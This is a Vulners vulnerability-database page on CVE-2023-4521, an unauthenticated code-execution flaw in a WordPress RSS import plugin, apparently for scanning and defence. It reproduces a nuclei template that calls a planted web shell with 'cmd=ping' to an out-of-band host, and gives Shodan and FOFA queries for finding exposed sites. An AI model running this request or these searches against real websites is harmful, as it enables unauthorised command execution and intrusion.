Lucene search
K

Import XML and RSS Feeds < 2.1.5 - Unauthenticated RCE

🗓️ 03 Jul 2026 13:39:16Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 125 Views

Import XML and RSS Feeds < 2.1.5 - Unauthenticated RCE. Allows unauthenticated attackers to execute arbitrary code on the target system

Related
Refs
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2023-4521
9 May 202408:03
circl
CNNVD
WordPress plugin Import XML and RSS Feeds Code Injection Vulnerability
25 Sep 202300:00
cnnvd
CVE
CVE-2023-4521
25 Sep 202315:56
cve
Cvelist
CVE-2023-4521 Import XML and RSS Feeds < 2.1.5 - Unauthenticated RCE
25 Sep 202315:56
cvelist
NVD
CVE-2023-4521
25 Sep 202316:15
nvd
OSV
CVE-2023-4521
25 Sep 202316:15
osv
Patchstack
WordPress Import XML and RSS Feeds Plugin < 2.1.5 is vulnerable to Remote Code Execution (RCE)
26 Sep 202300:00
patchstack
Prion
Code injection
25 Sep 202316:15
prion
Positive Technologies
PT-2023-29459 · WordPress · Import Xml/Rss Feeds
25 Sep 202300:00
ptsecurity
RedhatCVE
CVE-2023-4521
9 Jan 202612:32
redhatcve
Rows per page
id: CVE-2023-4521

info:
  name: Import XML and RSS Feeds < 2.1.5 - Unauthenticated RCE
  author: princechaddha
  severity: critical
  description: The Import XML and RSS Feeds WordPress plugin before 2.1.5 allows unauthenticated attackers to execute arbitrary commands via a web shell.
  impact: |
    Allows unauthenticated attackers to execute arbitrary code on the target system.
  remediation: |
    Update the Import XML and RSS Feeds WordPress Plugin to the latest version to mitigate the vulnerability.
  reference:
    - https://wpscan.com/vulnerability/de2cdb38-3a9f-448e-b564-a798d1e93481
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2023-4521
    epss-score: 0.39554
    epss-percentile: 0.98436
    cpe: cpe:2.3:a:mooveagency:import_xml_and_rss_feeds:*:*:*:*:*:wordpress:*:*
  metadata:
    max-request: 2
    vendor: mooveagency
    product: "import_xml_and_rss_feeds"
    framework: wordpress
    shodan-query: "http.html:\"import-xml-feed\""
    fofa-query: "body=\"import-xml-feed\""
  tags: cve,cve2023,wordpress,wp,wpscan,unauth,rce,mooveagency,vuln
flow: http(1) && http(2)

http:
  - raw:
      - |
        GET /wp-content/plugins/import-xml-feed/readme.txt HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: word
        internal: true
        words:
          - 'Import XML and RSS Feeds'

  - method: GET
    path:
      - "{{BaseURL}}/wp-content/plugins/import-xml-feed/uploads/169227090864de013cac47b.php?cmd=ping+{{interactsh-url}}"

    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "dns"
# digest: 490a0046304402205b048d2aca4c11dc548c1775bf744bd0358d5fdaf33296206ef4f8ae0f6f74ce02200d9a606753bd275cdf45e7553b4efbcd3457d70847eb6605c09b778c381e1092:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.4High risk
Vulners AI Score7.4
CVSS 3.19.8
EPSS0.39554
SSVC
125